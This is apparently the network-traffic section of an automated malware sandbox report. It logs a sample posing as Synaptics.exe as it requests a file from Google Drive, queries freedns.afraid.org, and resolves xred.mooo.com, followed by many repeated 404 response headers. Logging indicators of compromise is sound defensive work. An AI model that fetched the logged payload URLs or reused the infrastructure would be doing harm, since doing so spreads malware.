                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                                Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7fA_f1yz2G6qMJnHHHlZpEROzFDu7u_4Gs0Mi34Cy03ddzgbGkvRLUkBSIZY2_2FH1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:06 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-dnqnA7X8CQ1kQ9FIB-K8Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg; expires=Tue, 01-Jul-2025 10:48:06 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ywu_3TBP-MHjFpVsB2yRbR7tRjaSg_zGJzQaCblDdt9-PDcXGw7Qp7xLI4651CBjxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:07 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-R0EfUWx9XpW5Ur8e_oFlLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT; expires=Tue, 01-Jul-2025 10:48:07 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Is_SY6GhSH93Gfd4n8mrBZBjpgdlOHhWVwN3vxfYuPLI2YNcpq3gPe64ucg13EipQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:08 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-FKQQiM-Dc1ZGrfJu0-jOiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy; expires=Tue, 01-Jul-2025 10:48:08 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75sGvxFkdgXrovrw0O3ji1vGS1xugsTLKnSor4rG-MwSugKr5VjylxUzD5Ja7CAbT1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:09 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ecn_lmiftaqPWmfLmp5kZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7D8EYVwrZ65q-wBDCrbqclGYkQZmUy--ZA0fMzBRItSOe2exz2e4ahGHuQD5tPxLrKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:11 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IsE7cgg9OWNgmp-IjqyAwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7wL1O7eGnQfbIyjnu79wQMcr1xxpXFfx4rB0hz0kJS5zRKSOxBeOrqX3ZsAFcV-R1GContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:11 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-J0qKS794tsts7Nnm1xi5yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lgwcndIXYwfhWTqDwc76KZyCFonio53XjCTUiLrOsnKS02CUf0FrsfO0J3pQqmPIKhl8MTG4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:12 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mkOU95CkWifPwCZYfySFIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ZCohLJhndXIVrhUDrQprUey4PkU95_cujm4JOPJBQCcfqRklXXH7tO5D602pXcHGNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:13 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-o8fS_VFkkuSeTFvCDYEc6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62hyPrsp0AzqS8cV6Is9su_a3_xs9TRYcq_q7zbIihE7Q1JJqHTWLOE6MBDpfOJokGPiaIXnUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:15 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-MY7ZmaKP-8MULA2q5GHt-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5oznXsDYAgi4dwqWX1p_efBrGnCiXKvyLtFp3svzmC8aqunTLXXhy9gE-TyexzF0soContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:15 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qeOH72AY20mZI-glBLxagQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6k0L1BJ6XhY57Ipo91YvSKzYOvBqIJ_Hm8cXvJCz_gJAqJxZFD4PNcMMxBSw8k4rTF0JdU8ZMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ltYDdk36jpTYIsuLe-uYgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lG_KZ7i1BNFK9G2cJ81NtjHtiZus-IfaxOlZ36RWO-nOBeYU0xBOCQBXBtziiV6TuRAfywbwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:16 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-63ZV49Spiudd8hbtoKyFGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5LkxIxUAHF9S4ZJ6aJNwB27a63khB_y7-7HmIZPJ2Te1QJ-_-z-fjHAFRXLeZjlkbDfXQfqI8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:17 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-oLGlhjwAtG6D2pZIkBBHcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5I8iq2-FymV487rp7AMr1OKl2h_fFfSbadES__PYRxVgMPt_eqn5gn8mX2G0YID1GXContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:18 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-AxYkkwW1RFqbhBvLU9FXSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7waJcEVsFm7yWuAecR2ImABYhUMctvZFS8bYAMU3PFSf8AFTu07n-UV_72mLEmP6puContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:19 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-kKsgcgLe4BMiGndcy36ReA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4QkSJ7-dDZV8A6Y0lQ4_E3x9Aj5rRDV8M1wVyAokm0sezSQqxyGKDavb4BN2vmoqbuContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:19 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-AgOKDP1o0SBVbyS_DaFN6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6AndLhlbsNbkvm_Y0XT6VlLuxIXh3W7btSxNr7FWjt4TxbVQx542CdMItuCww7_TRyuraWJl0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:20 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-PIinZ9V_Ffr9OtBcF8AJoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, 